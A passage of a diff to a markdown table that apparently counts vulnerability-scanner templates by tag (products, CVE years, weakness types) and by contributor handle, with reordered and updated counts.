zhenwarx | 1 | | | | | | | -| targa | 3 | shelld3v | 1 | | | | | | | -| mongodb | 3 | aaron_costello | 1 | | | | | | | -| | | (@conspiracyproof) | | | | | | | | -| fpd | 3 | johnk3r | 1 | | | | | | | -| slack | 3 | b0yd | 1 | | | | | | | -| r-seenet | 3 | daviey | 1 | | | | | | | -| cve2010 | 3 | ipanda | 1 | | | | | | | -| springcloud | 3 | petruknisme | 1 | | | | | | | -| hp | 3 | streetofhackerr007 | 1 | | | | | | | -| vbulletin | 3 | alperenkesk | 1 | | | | | | | -| fanruan | 3 | sshell | 1 | | | | | | | -| windows | 3 | alex | 1 | | | | | | | -| amazon | 3 | furkansenan | 1 | | | | | | | -| openssh | 3 | yashanand155 | 1 | | | | | | | -| bypass | 3 | sickwell | 1 | | | | | | | -| nosqli | 3 | th3.d1p4k | 1 | | | | | | | -| kafka | 3 | defr0ggy | 1 | | | | | | | -| ofbiz | 3 | co0nan | 1 | | | | | | | -| ssh | 3 | raesene | 1 | | | | | | | -| printer | 3 | 0h1in9e | 1 | | | | | | | -| grafana | 3 | dogasantos | 1 | | | | | | | -| backups | 3 | aceseven (digisec360) | 1 | | | | | | | -| deserialization | 3 | affix | 1 | | | | | | | -| terramaster | 3 | juicypotato1 | 1 | | | | | | | -| git | 3 | jteles | 1 | | | | | | | -| log | 3 | ringo | 1 | | | | | | | -| nacos | 3 | akash.c | 1 | | | | | | | -| oa | 3 | bolli95 | 1 | | | | | | | -| kubernetes | 3 | rojanrijal | 1 | | | | | | | -| intrusive | 2 | s1r1u5_ | 1 | | | | | | | -| openfire | 2 | _harleo | 1 | | | | | | | -| spark | 2 | omarkurt | 1 | | | | | | | -| chamilo | 2 | 52971 | 1 | | | | | | | -| splunk | 2 | arcc | 1 | | | | | | | -| hpe | 2 | mubassirpatel | 1 | | | | | | | -| hashicorp | 2 | deena | 1 | | | | | | | -| chiyu | 2 | j3ssie/geraldino2 | 1 | | | | | | | -| paloalto | 2 | 0xrod | 1 | | | | | | | -| rstudio | 2 | idealphase | 1 | | | | | | | -| maian | 2 | schniggie | 1 | | | | | | | -| rockmongo | 2 | 0xteles | 1 | | | | | | | -| cache | 2 | kabirsuda | 1 | | | | | | | -| service | 2 | toufik airane | 1 | | | | | | | -| cve2008 | 2 | sushant kamble | 1 | | | | | | | -| | | (https://in.linkedin.com/in/sushantkamble) | | | | | | | | -| sharepoint | 2 | berkdusunur | 1 | | | | | | | -| telerik | 2 | _darrenmartyn | 1 | | | | | | | -| icewarp | 2 | elmahdi | 1 | | | | | | | -| trixbox | 2 | ooooooo_q | 1 | | | | | | | -| strapi | 2 | knassar702 | 1 | | | | | | | -| kentico | 2 | sy3omda | 1 | | | | | | | -| waf | 2 | ilovebinbash | 1 | | | | | | | -| frp | 2 | remonsec | 1 | | | | | | | -| activemq | 2 | retr0 | 1 | | | | | | | -| couchdb | 2 | noamrathaus | 1 | | | | | | | -| dos | 2 | regala_ | 1 | | | | | | | -| yapi | 2 | yavolo | 1 | | | | | | | -| zabbix | 2 | micha3lb3n | 1 | | | | | | | -| mida | 2 | undefl0w | 1 | | | | | | | -| mail | 2 | ldionmarcil | 1 | | | | | | | -| cve2007 | 2 | @dwisiswant0 | 1 | | | | | | | -| igs | 2 | d0rkerdevil | 1 | | | | | | | -| wordfence | 2 | b4uh0lz | 1 | | | | | | | -| odoo | 2 | kishore krishna (sillydaddy) | 1 | | | | | | | -| seeyon | 2 | un-fmunozs | 1 | | | | | | | -| ucmdb | 2 | its0x08 | 1 | | | | | | | -| hjtcloud | 2 | divya_mudgal | 1 | | | | | | | -| bigip | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| leak | 2 | cookiehanhoan | 1 | | | | | | | -| httpd | 2 | mohammedsaneem | 1 | | | | | | | -| zhiyuan | 2 | tim_koopmans | 1 | | | | | | | -| sonicwall | 2 | gal nagli | 1 | | | | | | | -| keycloak | 2 | alifathi-h1 | 1 | | | | | | | -| fortios | 2 | kba@sogeti_esec | 1 | | | | | | | -| rockethchat | 2 | tirtha_mandal | 1 | | | | | | | -| oauth | 2 | flag007 | 1 | | | | | | | -| glassfish | 2 | pdp | 1 | | | | | | | -| kibana | 2 | gboddin | 1 | | | | | | | -| jellyfin | 2 | g4l1t0 and @convisoappsec | 1 | | | | | | | -| idrac | 2 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| sonarqube | 2 | c3l3si4n | 1 | | | | | | | -| ecology | 2 | smaranchand | 1 | | | | | | | -| jboss | 2 | mhdsamx | 1 | | | | | | | -| saltstack | 2 | fopina | 1 | | | | | | | -| globalprotect | 2 | sicksec | 1 | | | | | | | -| pega | 2 | willd96 | 1 | | | | | | | -| xxljob | 2 | zandros0 | 1 | | | | | | | -| nextjs | 2 | 0ut0fb4nd | 1 | | | | | | | -| flir | 2 | ahmed sherif | 1 | | | | | | | -| bitrix | 2 | bernardofsr | 1 | | | | | | | -| prometheus | 2 | taielab | 1 | | | | | | | -| huawei | 2 | streetofhackerr007 (rohit | 1 | | | | | | | -| | | soni) | | | | | | | | -| webcam | 2 | wabafet | 1 | | | | | | | -| kevinlab | 2 | hanlaomo | 1 | | | | | | | -| voipmonitor | 2 | akshansh | 1 | | | | | | | -| plesk | 2 | shreyapohekar | 1 | | | | | | | -| natshell | 2 | ohlinge | 1 | | | | | | | -| nexus | 2 | manuelbua | 1 | | | | | | | -| showdoc | 2 | mah3sec_ | 1 | | | | | | | -| shellshock | 2 | qlkwej | 1 | | | | | | | -| nagios | 2 | bernardo rodrigues | 1 | | | | | | | +| adobe | 12 | ganofins | 5 | | | | | | | +| auth-bypass | 12 | pentest_swissky | 5 | | | | | | | +| weblogic | 12 | meme-lord | 4 | | | | | | | +| android | 12 | iamnoooob | 4 | | | | | | | +| dns | 11 | xelkomy | 4 | | | | | | | +| cve2012 | 11 | nodauf | 4 | | | | | | | +| zoho | 11 | elsfa7110 | 4 | | | | | | | +| springboot | 11 | github.com/its0x08 | 4 | | | | | | | +| cve2011 | 11 | rootxharsh | 4 | | | | | | | +| cve2014 | 10 | e_schultze_ | 4 | | | | | | | +| devops | 10 | impramodsargar | 3 | | | | | | | +| jenkins | 10 | z3bd | 3 | | | | | | | +| cve2013 | 10 | mavericknerd | 3 | | | | | | | +| php | 10 | binaryfigments | 3 | | | | | | | +| dlink | 10 | tess | 3 | | | | | | | +| magento | 9 | dudez | 3 | | | | | | | +| gitlab | 8 | shine | 3 | | | | | | | +| ftp | 8 | yash anand @yashanand155 | 3 | | | | | | | +| rails | 8 | fyoorer | 3 | | | | | | | +| aws | 8 | f1tz | 3 | | | | | | | +| airflow | 8 | thomas_from_offensity | 3 | | | | | | | +| cnvd | 8 | _generic_human_ | 3 | | | | | | | +| router | 8 | jarijaas | 3 | | | | | | | +| joomla | 7 | 0w4ys | 3 | | | | | | | +| nginx | 7 | ree4pwn | 2 | | | | | | | +| scada | 7 | joeldeleep | 2 | | | | | | | +| xxe | 7 | 0xsapra | 2 | | | | | | | +| vmware | 7 | incogbyte | 2 | | | | | | | +| coldfusion | 6 | x1m_martijn | 2 | | | | | | | +| jetty | 6 | vavkamil | 2 | | | | | | | +| rconfig | 6 | dheerajmadhukar | 2 | | | | | | | +| google | 6 | amsda | 2 | | | | | | | +| backup | 6 | fabaff | 2 | | | | | | | +| citrix | 6 | 0xrudra | 2 | | | | | | | +| api | 6 | 0xcrypto | 2 | | | | | | | +| cms | 6 | hetroublemakr | 2 | | | | | | | +| lucee | 5 | koti2 | 2 | | | | | | | +| java | 5 | 0xelkomy | 2 | | | | | | | +| dedecms | 5 | davidmckennirey | 2 | | | | | | | +| ruijie | 5 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| drupal | 5 | bp0lr | 2 | | | | | | | +| django | 5 | udit_thakkur | 2 | | | | | | | +| dell | 5 | nkxxkn | 2 | | | | | | | +| circarlife | 5 | bing0o | 2 | | | | | | | +| ibm | 5 | bsysop | 2 | | | | | | | +| ssti | 5 | ehsahil | 2 | | | | | | | +| confluence | 5 | gevakun | 2 | | | | | | | +| cve2009 | 5 | lotusdll | 2 | | | | | | | +| netgear | 5 | lu4nx | 2 | | | | | | | +| login | 5 | random-robbie | 2 | | | | | | | +| headless | 5 | randomrobbie | 2 | | | | | | | +| laravel | 5 | manas_harsh | 2 | | | | | | | +| solr | 5 | moritz nentwig | 2 | | | | | | | +| iis | 5 | unstabl3 | 2 | | | | | | | +| phpmyadmin | 5 | afaq | 2 | | | | | | | +| files | 5 | pxmme1337 | 2 | | | | | | | +| thinkphp | 4 | 0xprial | 2 | | | | | | | +| hongdian | 4 | emenalf | 2 | | | | | | | +| solarwinds | 4 | zomsop82 | 2 | | | | | | | +| magmi | 4 | shifacyclewala | 2 | | | | | | | +| tomcat | 4 | w4cky_ | 2 | | | | | | | +| samsung | 4 | foulenzer | 2 | | | | | | | +| jolokia | 4 | swissky | 2 | | | | | | | +| webserver | 4 | kiblyn11 | 2 | | | | | | | +| elastic | 4 | thevillagehacker | 1 | | | | | | | +| traversal | 4 | bernardo rodrigues | 1 | | | | | | | | | | @bernardofsr | andré monteiro | | | | | | | | | | | @am0nt31r0 | | | | | | | | -| smtp | 2 | andirrahmani1 | 1 | | | | | | | -| smb | 2 | aresx | 1 | | | | | | | -| vrealize | 2 | naglinagli | 1 | | | | | | | -| linkerd | 2 | chron0x | 1 | | | | | | | -| injection | 2 | bad5ect0r | 1 | | | | | | | -| openam | 2 | blckraven | 1 | | | | | | | -| proxy | 2 | thezakman | 1 | | | | | | | -| microsoft | 2 | johnjhacking | 1 | | | | | | | -| emerge | 2 | @github.com/defr0ggy | 1 | | | | | | | -| openstack | 1 | j33n1k4 | 1 | | | | | | | -| mdb | 1 | r3naissance | 1 | | | | | | | -| tensorboard | 1 | becivells | 1 | | | | | | | -| rujjie | 1 | fmunozs | 1 | | | | | | | -| dvwa | 1 | ratnadip gajbhiye | 1 | | | | | | | -| sprintful | 1 | dawid czarnecki | 1 | | | | | | | -| synnefo | 1 | patralos | 1 | | | | | | | -| hiboss | 1 | sullo | 1 | | | | | | | -| opensmtpd | 1 | luci | 1 | | | | | | | -| memcached | 1 | rodnt | 1 | | | | | | | -| biometrics | 1 | sid ahmed malaoui @ realistic | 1 | | | | | | | +| vpn | 4 | sshell | 1 | | | | | | | +| artifactory | 4 | gal nagli | 1 | | | | | | | +| fileupload | 4 | mubassirpatel | 1 | | | | | | | +| nodejs | 4 | furkansenan | 1 | | | | | | | +| moodle | 4 | un-fmunozs | 1 | | | | | | | +| crlf | 4 | thezakman | 1 | | | | | | | +| asp | 4 | aaron_costello | 1 | | | | | | | +| | | (@conspiracyproof) | | | | | | | | +| docker | 4 | j33n1k4 | 1 | | | | | | | +| thinkcmf | 4 | kareemse1im | 1 | | | | | | | +| grafana | 3 | divya_mudgal | 1 | | | | | | | +| springcloud | 3 | 0xrod | 1 | | | | | | | +| slack | 3 | naglinagli | 1 | | | | | | | +| microstrategy | 3 | @dwisiswant0 | 1 | | | | | | | +| nacos | 3 | _darrenmartyn | 1 | | | | | | | +| ofbiz | 3 | johnjhacking | 1 | | | | | | | +| windows | 3 | bad5ect0r | 1 | | | | | | | +| nosqli | 3 | regala_ | 1 | | | | | | | +| backups | 3 | geraldino2 | 1 | | | | | | | +| fpd | 3 | smaranchand | 1 | | | | | | | +| kubernetes | 3 | wabafet | 1 | | | | | | | +| hp | 3 | gboddin | 1 | | | | | | | +| ebs | 3 | makyotox | 1 | | | | | | | +| targa | 3 | chron0x | 1 | | | | | | | +| ssh | 3 | g4l1t0 and @convisoappsec | 1 | | | | | | | +| vbulletin | 3 | akash.c | 1 | | | | | | | +| oa | 3 | fmunozs | 1 | | | | | | | +| r-seenet | 3 | daviey | 1 | | | | | | | +| amazon | 3 | blckraven | 1 | | | | | | | +| resin | 3 | alex | 1 | | | | | | | +| caucho | 3 | knassar702 | 1 | | | | | | | +| cve2010 | 3 | remonsec | 1 | | | | | | | +| mongodb | 3 | noamrathaus | 1 | | | | | | | +| fanruan | 3 | soyelmago | 1 | | | | | | | +| deserialization | 3 | shreyapohekar | 1 | | | | | | | +| log | 3 | ohlinge | 1 | | | | | | | +| git | 3 | cookiehanhoan | 1 | | | | | | | +| openssh | 3 | retr0 | 1 | | | | | | | +| terramaster | 3 | 0xtavian | 1 | | | | | | | +| bypass | 3 | bolli95 | 1 | | | | | | | +| kafka | 3 | ldionmarcil | 1 | | | | | | | +| lfr | 3 | fopina | 1 | | | | | | | +| printer | 3 | jeya seelan | 1 | | | | | | | +| frp | 2 | nytr0gen | 1 | | | | | | | +| jboss | 2 | rtcms | 1 | | | | | | | +| ucmdb | 2 | elmahdi | 1 | | | | | | | +| webcam | 2 | defr0ggy | 1 | | | | | | | +| plesk | 2 | c3l3si4n | 1 | | | | | | | +| microsoft | 2 | vsh00t | 1 | | | | | | | +| proxy | 2 | exploitation | 1 | | | | | | | +| trixbox | 2 | andysvints | 1 | | | | | | | +| paloalto | 2 | 52971 | 1 | | | | | | | +| xxljob | 2 | mah3sec_ | 1 | | | | | | | +| keycloak | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | +| smb | 2 | sickwell | 1 | | | | | | | +| linkerd | 2 | dawid czarnecki | 1 | | | | | | | +| natshell | 2 | affix | 1 | | | | | | | +| jellyfin | 2 | yashanand155 | 1 | | | | | | | +| globalprotect | 2 | mhdsamx | 1 | | | | | | | +| httpd | 2 | whynotke | 1 | | | | | | | +| hjtcloud | 2 | bjhulst | 1 | | | | | | | +| sonarqube | 2 | d0rkerdevil | 1 | | | | | | | +| cache | 2 | raesene | 1 | | | | | | | +| showdoc | 2 | undefl0w | 1 | | | | | | | +| vrealize | 2 | sushant kamble | 1 | | | | | | | +| | | (https://in.linkedin.com/in/sushantkamble) | | | | | | | | +| dos | 2 | ipanda | 1 | | | | | | | +| kibana | 2 | co0nan | 1 | | | | | | | +| mida | 2 | patralos | 1 | | | | | | | +| oauth | 2 | sicksec | 1 | | | | | | | +| fortios | 2 | hakluke | 1 | | | | | | | +| rstudio | 2 | luci | 1 | | | | | | | +| strapi | 2 | ahmed sherif | 1 | | | | | | | +| cve2008 | 2 | streetofhackerr007 | 1 | | | | | | | +| shellshock | 2 | rojanrijal | 1 | | | | | | | +| openfire | 2 | 0ut0fb4nd | 1 | | | | | | | +| intrusive | 2 | alph4byt3 | 1 | | | | | | | +| kentico | 2 | b0yd | 1 | | | | | | | +| emerge | 2 | hanlaomo | 1 | | | | | | | +| kevinlab | 2 | revblock | 1 | | | | | | | +| hpe | 2 | sullo | 1 | | | | | | | +| mail | 2 | andirrahmani1 | 1 | | | | | | | +| ecology | 2 | sy3omda | 1 | | | | | | | +| yapi | 2 | kabirsuda | 1 | | | | | | | +| idrac | 2 | alifathi-h1 | 1 | | | | | | | +| splunk | 2 | idealphase | 1 | | | | | | | +| cve2007 | 2 | kba@sogeti_esec | 1 | | | | | | | +| rockmongo | 2 | deena | 1 | | | | | | | +| openam | 2 | taielab | 1 | | | | | | | +| zhiyuan | 2 | alperenkesk | 1 | | | | | | | +| seeyon | 2 | micha3lb3n | 1 | | | | | | | +| wordfence | 2 | shelld3v | 1 | | | | | | | +| smtp | 2 | becivells | 1 | | | | | | | +| odoo | 2 | s1r1u5_ | 1 | | | | | | | +| service | 2 | toufik airane | 1 | | | | | | | +| waf | 2 | luskabol | 1 | | | | | | | +| nagios | 2 | arcc | 1 | | | | | | | +| rockethchat | 2 | schniggie | 1 | | | | | | | +| zabbix | 2 | th3.d1p4k | 1 | | | | | | | +| chiyu | 2 | 0xteles | 1 | | | | | | | +| couchdb | 2 | _harleo | 1 | | | | | | | +| prometheus | 2 | pdp | 1 | | | | | | | +| injection | 2 | kurohost | 1 | | | | | | | +| telerik | 2 | notsoevilweasel | 1 | | | | | | | +| chamilo | 2 | ringo | 1 | | | | | | | +| nexus | 2 | pudsec | 1 | | | | | | | +| bigip | 2 | omarkurt | 1 | | | | | | | +| huawei | 2 | flag007 | 1 | | | | | | | +| glassfish | 2 | dogasantos | 1 | | | | | | | +| leak | 2 | vzamanillo | 1 | | | | | | | +| voipmonitor | 2 | yavolo | 1 | | | | | | | +| bitrix | 2 | @github.com/defr0ggy | 1 | | | | | | | +| pega | 2 | juicypotato1 | 1 | | | | | | | +| igs | 2 | ilovebinbash | 1 | | | | | | | +| maian | 2 | iampritam | 1 | | | | | | | +| spark | 2 | abison_binoy | 1 | | | | | | | +| hashicorp | 2 | 0h1in9e | 1 | | | | | | | +| saltstack | 2 | apt-mirror | 1 | | | | | | | +| icewarp | 2 | yashgoti | 1 | | | | | | | +| activemq | 2 | willd96 | 1 | | | | | | | +| sonicwall | 2 | absshax | 1 | | | | | | | +| sharepoint | 2 | sid ahmed malaoui @ realistic | 1 | | | | | | | | | | security | | | | | | | | -| myucms | 1 | kareemse1im | 1 | | | | | | | -| ruckus | 1 | vzamanillo | 1 | | | | | | | -| webmin | 1 | 0xtavian | 1 | | | | | | | -| landray | 1 | thevillagehacker | 1 | | | | | | | -| monitorix | 1 | luskabol | 1 | | | | | | | -| erp-nc | 1 | apt-mirror | 1 | | | | | | | -| zmanda | 1 | nytr0gen | 1 | | | | | | | -| acme | 1 | makyotox | 1 | | | | | | | -| redhat | 1 | abison_binoy | 1 | | | | | | | -| phpunit | 1 | vsh00t | 1 | | | | | | | -| apos | 1 | exploitation | 1 | | | | | | | -| shopxo | 1 | iampritam | 1 | | | | | | | -| wildfly | 1 | revblock | 1 | | | | | | | -| fastapi | 1 | jeya seelan | 1 | | | | | | | -| vnc | 1 | hakluke | 1 | | | | | | | -| diris | 1 | | | | | | | | | -| ssl | 1 | | | | | | | | | -| rfi | 1 | | | | | | | | | -| ntopng | 1 | | | | | | | | | -| aura | 1 | | | | | | | | | -| cve2005 | 1 | | | | | | | | | -| uwsgi | 1 | | | | | | | | | -| jmx | 1 | | | | | | | | | -| blackboard | 1 | | | | | | | | | -| htmli | 1 | | | | | | | | | -| tpshop | 1 | | | | | | | | | -| nc2 | 1 | | | | | | | | | -| portainer | 1 | | | | | | | | | -| plone | 1 | | | | | | | | | -| jenzabar | 1 | | | | | | | | | -| xml | 1 | | | | | | | | | -| cobub | 1 | | | | | | | | | -| rhymix | 1 | | | | | | | | | -| trilithic | 1 | | | | | | | | | -| opencast | 1 | | | | | | | | | -| razor | 1 | | | | | | | | | -| parentlink | 1 | | | | | | | | | -| zte | 1 | | | | | | | | | -| hasura | 1 | | | | | | | | | -| ioncube | 1 | | | | | | | | | -| akkadian | 1 | | | | | | | | | -| expressjs | 1 | | | | | | | | | -| nedi | 1 | | | | | | | | | -| javafaces | 1 | | | | | | | | | -| lancom | 1 | | | | | | | | | -| upnp | 1 | | | | | | | | | -| scs | 1 | | | | | | | | | -| webftp | 1 | | | | | | | | | -| mariadb | 1 | | | | | | | | | -| tapestry | 1 | | | | | | | | | -| acexy | 1 | | | | | | | | | -| gitlist | 1 | | | | | | | | | -| dvr | 1 | | | | | | | | | -| moinmoin | 1 | | | | | | | | | -| visionhub | 1 | | | | | | | | | -| discord | 1 | | | | | | | | | -| proftpd | 1 | | | | | | | | | -| cloudinary | 1 | | | | | | | | | -| lanproxy | 1 | | | | | | | | | -| opm | 1 | | | | | | | | | -| rdp | 1 | | | | | | | | | -| varnish | 1 | | | | | | | | | -| openrestry | 1 | | | | | | | | | -| csrf | 1 | | | | | | | | | -| krweb | 1 | | | | | | | | | -| visualtools | 1 | | | | | | | | | -| status | 1 | | | | | | | | | -| servicenow | 1 | | | | | | | | | -| k8s | 1 | | | | | | | | | -| comodo | 1 | | | | | | | | | -| nexusdb | 1 | | | | | | | | | -| socomec | 1 | | | | | | | | | -| apiman | 1 | | | | | | | | | -| enum | 1 | | | | | | | | | -| mcafee | 1 | | | | | | | | | -| plugin | 1 | | | | | | | | | -| tensorflow | 1 | | | | | | | | | -| wiki | 1 | | | | | | | | | -| adminer | 1 | | | | | | | | | -| magicflow | 1 | | | | | | | | | -| aspnuke | 1 | | | | | | | | | -| xunchi | 1 | | | | | | | | | -| goahead | 1 | | | | | | | | | -| doh | 1 | | | | | | | | | -| triconsole | 1 | | | | | | | | | -| linkedin | 1 | | | | | | | | | -| xff | 1 | | | | | | | | | -| zm | 1 | | | | | | | | | -| majordomo2 | 1 | | | | | | | | | -| pgadmin | 1 | | | | | | | | | -| dotnet | 1 | | | | | | | | | -| zeroshell | 1 | | | | | | | | | -| geddy | 1 | | | | | | | | | +| flir | 2 | kishore krishna (sillydaddy) | 1 | | | | | | | +| nextjs | 2 | tirtha_mandal | 1 | | | | | | | +| redcap | 1 | _c0wb0y_ | 1 | | | | | | | +| mantis | 1 | r3naissance | 1 | | | | | | | +| npm | 1 | aceseven (digisec360) | 1 | | | | | | | +| anchorcms | 1 | j3ssie/geraldino2 | 1 | | | | | | | +| k8s | 1 | bernardofsr | 1 | | | | | | | +| shopxo | 1 | johnk3r | 1 | | | | | | | +| alibaba | 1 | rodnt | 1 | | | | | | | +| axis | 1 | akshansh | 1 | | | | | | | +| jsf | 1 | jteles | 1 | | | | | | | +| servicenow | 1 | ivo palazzolo (@palaziv) | 1 | | | | | | | +| expn | 1 | ratnadip gajbhiye | 1 | | | | | | | +| sco | 1 | its0x08 | 1 | | | | | | | +| h3c-imc | 1 | mohammedsaneem | 1 | | | | | | | +| powercreator | 1 | shifacyclewla | 1 | | | | | | | +| haproxy | 1 | aresx | 1 | | | | | | | +| gateone | 1 | ooooooo_q | 1 | | | | | | | +| plugin | 1 | zandros0 | 1 | | | | | | | +| duomicms | 1 | ajaysenr | 1 | | | | | | | +| addpac | 1 | berkdusunur | 1 | | | | | | | +| blind | 1 | qlkwej | 1 | | | | | | | +| netsweeper | 1 | petruknisme | 1 | | | | | | | +| javamelody | 1 | tim_koopmans | 1 | | | | | | | +| wiki | 1 | manuelbua | 1 | | | | | | | +| faraday | 1 | streetofhackerr007 (rohit | 1 | | | | | | | +| | | soni) | | | | | | | | +| ec2 | 1 | zhenwarx | 1 | | | | | | | +| mongoshake | 1 | b4uh0lz | 1 | | | | | | | | xiuno | 1 | | | | | | | | | -| finereport | 1 | | | | | | | | | -| livezilla | 1 | | | | | | | | | -| duomicms | 1 | | | | | | | | | -| pyramid | 1 | | | | | | | | | -| akamai | 1 | | | | | | | | | -| spectracom | 1 | | | | | | | | | -| fastcgi | 1 | | | | | | | | | -| email | 1 | | | | | | | | | -| dotnetnuke | 1 | | | | | | | | | -| maccmsv10 | 1 | | | | | | | | | -| mediumish | 1 | | | | | | | | | -| grav | 1 | | | | | | | | | -| interlib | 1 | | | | | | | | | -| chinaunicom | 1 | | | | | | | | | -| clave | 1 | | | | | | | | | -| traefik | 1 | | | | | | | | | -| opentsdb | 1 | | | | | | | | | -| tika | 1 | | | | | | | | | -| codeigniter | 1 | | | | | | | | | -| crm | 1 | | | | | | | | | -| sceditor | 1 | | | | | | | | | -| appweb | 1 | | | | | | | | | -| ganglia | 1 | | | | | | | | | -| openerp | 1 | | | | | | | | | -| nsasg | 1 | | | | | | | | | -| jquery | 1 | | | | | | | | | -| manageengine | 1 | | | | | | | | | -| ruby | 1 | | | | | | | | | -| jsf | 1 | | | | | | | | | -| nuxeo | 1 | | | | | | | | | -| iptime | 1 | | | | | | | | | -| centos | 1 | | | | | | | | | -| domxss | 1 | | | | | | | | | -| wso2 | 1 | | | | | | | | | -| ecom | 1 | | | | | | | | | -| payara | 1 | | | | | | | | | -| arl | 1 | | | | | | | | | -| flink | 1 | | | | | | | | | -| selea | 1 | | | | | | | | | -| saltapi | 1 | | | | | | | | | -| expose | 1 | | | | | | | | | -| kong | 1 | | | | | | | | | -| wmt | 1 | | | | | | | | | -| phpfusion | 1 | | | | | | | | | -| robomongo | 1 | | | | | | | | | -| wavemaker | 1 | | | | | | | | | -| ec2 | 1 | | | | | | | | | -| upload | 1 | | | | | | | | | -| kubeflow | 1 | | | | | | | | | -| zend | 1 | | | | | | | | | -| redis | 1 | | | | | | | | | -| node | 1 | | | | | | | | | -| avtech | 1 | | | | | | | | | -| bullwark | 1 | | | | | | | | | -| esmtp | 1 | | | | | | | | | -| anchorcms | 1 | | | | | | | | | -| mara | 1 | | | | | | | | | -| opensns | 1 | | | | | | | | | -| haproxy | 1 | | | | | | | | | -| bookstack | 1 | | | | | | | | | -| heroku | 1 | | | | | | | | | -| servicedesk | 1 | | | | | | | | | -| jnoj | 1 | | | | | | | | | -| netsweeper | 1 | | | | | | | | | -| jfrog | 1 | | | | | | | | | -| blue-ocean | 1 | | | | | | | | | -| clusterengine | 1 | | | | | | | | | -| javascript | 1 | | | | | | | | | -| zimbra | 1 | | | | | | | | | -| szhe | 1 | | | | | | | | | -| geutebruck | 1 | | | | | | | | | -| rmi | 1 | | | | | | | | | -| beanshell | 1 | | | | | | | | | -| fuelcms | 1 | | | | | | | | | -| rubedo | 1 | | | | | | | | | -| nuuo | 1 | | | | | | | | | -| 74cms | 1 | | | | | | | | | -| mpsec | 1 | | | | | | | | | -| concrete | 1 | | | | | | | | | -| sidekiq | 1 | | | | | | | | | -| postgres | 1 | | | | | | | | | -| bruteforce | 1 | | | | | | | | | -| gateone | 1 | | | | | | | | | -| enumeration | 1 | | | | | | | | | -| webadmin | 1 | | | | | | | | | -| ricoh | 1 | | | | | | | | | -| turbocrm | 1 | | | | | | | | | -| vsphere | 1 | | | | | | | | | -| fortiweb | 1 | | | | | | | | | -| flash | 1 | | | | | | | | | -| vsftpd | 1 | | | | | | | | | -| hadoop | 1 | | | | | | | | | -| jsp | 1 | | | | | | | | | -| cloudflare | 1 | | | | | | | | | -| exchange | 1 | | | | | | | | | -| starttls | 1 | | | | | | | | | -| xmlchart | 1 | | | | | | | | | -| keenetic | 1 | | | | | | | | | -| scimono | 1 | | | | | | | | | -| mailchimp | 1 | | | | | | | | | -| lansweeper | 1 | | | | | | | | | -| huijietong | 1 | | | | | | | | | -| dom | 1 | | | | | | | | | -| accela | 1 | | | | | | | | | -| spidercontrol | 1 | | | | | | | | | -| gogs | 1 | | | | | | | | | -| xdcms | 1 | | | | | | | | | -| fortilogger | 1 | | | | | | | | | -| mirai | 1 | | | | | | | | | -| mobileiron | 1 | | | | | | | | | -| mantisbt | 1 | | | | | | | | | -| jenkin | 1 | | | | | | | | | -| rsyncd | 1 | | | | | | | | | -| alibaba | 1 | | | | | | | | | -| sqlite | 1 | | | | | | | | | -| drone | 1 | | | | | | | | | -| st | 1 | | | | | | | | | -| svnserve | 1 | | | | | | | | | -| mongo | 1 | | | | | | | | | -| cors | 1 | | | | | | | | | -| redcap | 1 | | | | | | | | | -| viewpoint | 1 | | | | | | | | | -| panos | 1 | | | | | | | | | -| bolt | 1 | | | | | | | | | -| webmodule-ee | 1 | | | | | | | | | -| backdoor | 1 | | | | | | | | | -| tongda | 1 | | | | | | | | | -| lighttpd | 1 | | | | | | | | | -| seacms | 1 | | | | | | | | | -| plastic | 1 | | | | | | | | | -| idemia | 1 | | | | | | | | | -| exacqvision | 1 | | | | | | | | | -| sentry | 1 | | | | | | | | | -| websvn | 1 | | | | | | | | | -| ems | 1 | | | | | | | | | -| circontrorl | 1 | | | | | | | | | -| fortigates | 1 | | | | | | | | | -| fortigate | 1 | | | | | | | | | -| panabit | 1 | | | | | | | | | -| harbor | 1 | | | | | | | | | -| moin | 1 | | | | | | | | | -| druid | 1 | | | | | | | | | -| viewlinc | 1 | | | | | | | | | -| npm | 1 | | | | | | | | | -| phpinfo | 1 | | | | | | | | | -| setup | 1 | | | | | | | | | -| zzzcms | 1 | | | | | | | | | -| cacti | 1 | | | | | | | | | -| thinkadmin | 1 | | | | | | | | | -| empirecms | 1 | | | | | | | | | -| default-login | 1 | | | | | | | | | -| tileserver | 1 | | | | | | | | | -| blind | 1 | | | | | | | | | -| salesforce | 1 | | | | | | | | | -| commscope | 1 | | | | | | | | | -| pippoint | 1 | | | | | | | | | -| lutron | 1 | | | | | | | | | -| nps | 1 | | | | | | | | | -| nomad | 1 | | | | | | | | | -| phalcon | 1 | | | | | | | | | -| rabbitmq | 1 | | | | | | | | | -| eyou | 1 | | | | | | | | | -| glpi | 1 | | | | | | | | | -| discourse | 1 | | | | | | | | | -| smartsense | 1 | | | | | | | | | -| expn | 1 | | | | | | | | | -| yachtcontrol | 1 | | | | | | | | | -| pacsone | 1 | | | | | | | | | -| klog | 1 | | | | | | | | | -| rmc | 1 | | | | | | | | | -| tamronos | 1 | | | | | | | | | -| linksys | 1 | | | | | | | | | -| grails | 1 | | | | | | | | | -| spf | 1 | | | | | | | | | -| checkpoint | 1 | | | | | | | | | -| k8 | 1 | | | | | | | | | -| swagger | 1 | | | | | | | | | -| realteo | 1 | | | | | | | | | -| postmessage | 1 | | | | | | | | | -| kyan | 1 | | | | | | | | | -| bitly | 1 | | | | | | | | | -| soar | 1 | | | | | | | | | -| mysql | 1 | | | | | | | | | -| ilo4 | 1 | | | | | | | | | -| octobercms | 1 | | | | | | | | | -| zenario | 1 | | | | | | | | | -| codemeter | 1 | | | | | | | | | -| darkstat | 1 | | | | | | | | | -| axis | 1 | | | | | | | | | -| h3c-imc | 1 | | | | | | | | | -| springframework | 1 | | | | | | | | | -| db | 1 | | | | | | | | | -| fedora | 1 | | | | | | | | | -| ueditor | 1 | | | | | | | | | -| jitsi | 1 | | | | | | | | | -| optiLink | 1 | | | | | | | | | -| gloo | 1 | | | | | | | | | -| vscode | 1 | | | | | | | | | -| node-red-dashboard | 1 | | | | | | | | | -| mautic | 1 | | | | | | | | | -| firebase | 1 | | | | | | | | | -| lotuscms | 1 | | | | | | | | | -| metinfo | 1 | | | | | | | | | -| ambari | 1 | | | | | | | | | -| symfony | 1 | | | | | | | | | -| b2evolution | 1 | | | | | | | | | -| octoprint | 1 | | | | | | | | | -| 